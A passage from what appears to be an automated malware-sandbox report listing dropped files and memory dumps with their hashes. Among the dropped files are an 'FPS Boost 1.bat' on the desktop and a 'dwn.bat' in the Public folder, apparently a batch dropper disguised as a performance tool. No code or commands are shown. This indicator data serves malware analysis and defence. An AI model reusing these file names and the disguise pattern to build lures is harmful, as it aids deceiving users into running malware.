8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5

SHA512
b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2cfd47d704b828a486e659c98bda4a22

SHA1
6f44d9fc847354b91e4935ff8fd21bda031628da

SHA256
37b764a2b1054f839e7184f9d3ef3069601881a0022a11c719a4652b688b6a21

SHA512
8495aeaa40dd01fe74ac4dfe5f2d4f680a9e140ae4a660047a2d5bdcf4aeb7e96ee9c966736da6d468ae008cefad71d8a0aac2d408a8a695fd2ef15ab5970744

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d6d29656cf408f5c5e1efbfa3d89082e

SHA1
07070fea90379651fef3f651e1511dc0b65e1113

SHA256
608dafb8a6bf0c75d9c5a3fb72956e55cc0c9e21f795335ef461eafb85114920

SHA512
6b7d50228cf0b50081337edcbea884a4c518624f0a150c3946f3592df23e260f8c9a74ae3d6291c50cd14760e8e8e1d74ee9700a11b2e1afbc62114358a68e36

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\YCLWQ4BV\microsoft.windows[1].xml

Filesize
97B

MD5
781c2d6d1f6f2f8ae243c569925a6c44

SHA1
6d5d26acc2002f5a507bd517051095a97501931b

SHA256
70687e419879f006d0c50c08657c66b1187b94ea216cfe0a2e6be8bd2de77bc8

SHA512
3599fa8f2ffe140a8f68ec735810d24a5b367a9a551d620baa6dc611ca755dce1a662bf22b90f842d499d2c9530fb8acd634d1654d5e2c1b319574cbf35eadf7

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133729334828258628.txt

Filesize
74KB

MD5
50597e60465ea5ffd800d91048ea729e

SHA1
34c133c50e1505023995d506706b0ec651cb764c

SHA256
6b94fcf8a37261e7c3e1427429f0eea73a007a0beca0f7a53264d1f7712a782a

SHA512
6c3e5664970743e1f4765b34471a086d082a8253eacc6b437fbfe9201a704b82130f9ea52343456322c23a2f712ae6c0cd4daafca6093673018cf1ed1afdbdd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dnv1ecy4.d03.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\FPS Boost 1.bat

Filesize
55KB

MD5
76f94fe08cc7b659f2d6b8e475a74baa

SHA1
6bee16deff8a87e3f02d4b11380da60bf976a240

SHA256
fd5967c4267c8fde06482595aff50653e801cd0cb0110a5799fa0d2c7bb0f0b1

SHA512
1ce7656aa64d2e1809a8fb1ea2b9ffb03213b63b99330ec5a1ccd792ceae85f7d52a42e4ca1aadad45ba4a01e10a12a03b162936838fc2a57bc079211e92bb54

Download Submit
C:\Users\Public\dwn.bat

Filesize
634B

MD5
cf04779e43afe21e2420e4fc4641c551

SHA1
59143b29ad70180bbd90daaf12f9309eb4625fc4

SHA256
f03f052041664c4359f61f7acc64705d15d821f445af92cd74d8ddf8056f1701

SHA512
4c712fe8ec9bbad7c34848aa46c44de62c9974f1a89fb27922868392a656c389a33e7ba63418e128524969f9c96e1ea7c39b24e77f53799d67c0b6b86df94dcb

Download Submit
C:\Windows\System32\ ]

Filesize
3B

MD5
df66fa563a2fafdb93cc559deb0a38c4

SHA1
e6666cf8574b0f7a9ae5bccee572f965c2aec9cb

SHA256
3e39ed22dc63246937c4dbbf34ce4fb1cfe6b00de7596b020cad49ae50031351

SHA512
34ea05ee75cd840a94526411777868edb293a69867e1fdc2c2e917d278a3d58fcb86afc65142f4b184ce6907f04fb254a86061cfb620f01874b0b454a6f01c18

Download Submit
memory/388-163-0x0000020F51400000-0x0000020F51416000-memory.dmp

Filesize
88KB

Download
memory/388-164-0x0000020F51420000-0x0000020F5142A000-memory.dmp

Filesize
40KB

Download
memory/388-165-0x0000020F51490000-0x0000020F514B6000-memory.dmp

Filesize
152KB

Download
memory/388-966-0x0000000003590000-0x0000000003591000-memory.dmp

Filesize
4KB

Download
memory/1628-684-0x000001EB8F660000-0x000001EB8F680000-memory.dmp

Filesize
128KB

Download
memory/1628-680-0x000001EB8E300000-0x000001EB8E400000-memory.dmp

Filesize
1024KB

Download
memory/1628-679-0x000001EB8E300000-0x000001EB8E400000-memory.dmp

Filesize
1024KB

Download
memory/1628-686-0x000001EB8F620000-0x000001EB8F640000-memory.dmp

Filesize
128KB

Download
memory/1628-698-0x000001EB8FA30000-0x000001EB8FA50000-memory.dmp

Filesize
128KB

Download
memory/1788-369-0x0000000004C80000-0x0000000004C81000-memory.dmp

Filesize
4KB

Download
memory/1968-529-0x0000000004DB0000-0x0000000004DB1000-memory.dmp

Filesize
4KB

Download
memory/2496-815-0x0000000004260000-0x0000000004261000-memory.dmp

Filesize
4KB

Download
memory/3276-567-0x000001601FE40000-0x000001601FE60000-memory.dmp

Filesize
128KB

Download
memory/3276-536-0x000001601FA70000-0x000001601FA90000-memory.dmp

Filesize
128KB

Download
memory/3276-531-0x000001601EA00000-0x000001601EB00000-memory.dmp

Filesize
1024KB

Download
memory/3276-566-0x000001601FA30000-0x000001601FA50000-memory.dmp

Filesize
128KB

Download
memory/3296-677-0x0000000004FF0000-0x0000000004FF1000-memory.dmp

Filesize
4KB

Download
memory/4356-57-0x00000215F5E40000-0x00000215F5E50000-memory.dmp

Filesize
64KB

Download
memory/4356-56-0x00000215F68B0000-0x00000215F6DD8000-memory.dmp

Filesize
5.2MB

Download
memory/4440-13-0x000001DD39330000-0x000001DD394F2000-memory.dmp

Filesize
1.8MB

Download
memory/4440-12-0x000001DD38D50000-0x000001DD38D72000-memory.dmp

Filesize
136KB

Download
memory/4688-405-0x000001CF35E20000-0x000001CF35E40000-memory.dmp

Filesize
128KB

Download
memory/4688-387-0x000001CF35A20000-0x000001CF35A40000-memory.dmp

Filesize
128KB

Download
memory/4688-376-0x000001CF35A60000-0x000001CF35A80000-memory.dmp

Filesize
128KB

Download
memory/4688-373-0x000001C733700000-0x000001C733800000-memory.dmp

Filesize
1024KB

Download
memory/4688-372-0x000001C733700000-0x000001C733800000-memory.dmp

Filesize
1024KB

Download
memory/4728-818-0x00000218E3900000-0x00000218E3A00000-memory.dmp

Filesize
1024KB

Download
memory/4728-822-0x00000218E4A40000-0x00000218E4A60000-memory.dmp

Filesize
128KB

Download
memory/4728-817-0x00000218E3900000-0x00000218E3A00000-memory.dmp

Filesize
1024KB

Download
memory/4728-836-0x00000218E4A00000-0x00000218E4A20000-memory.dmp

Filesize
128KB

Download
memory/4728-853-0x00000218E4E00000-0x00000218E4E20000-memory.dmp

Filesize
128KB

Download
memory/5020-973-0x00000275EF1B0000-0x00000275EF1D0000-memory.dmp

Filesize
128KB

Download
memory/5020-985-0x00000275EF170000-0x00000275EF190000-memory.dmp

Filesize
128KB

Download
memory/5020-1004-0x00000275EF580000-0x00000275EF5A0000-memory.dmp

Filesize
128KB

Download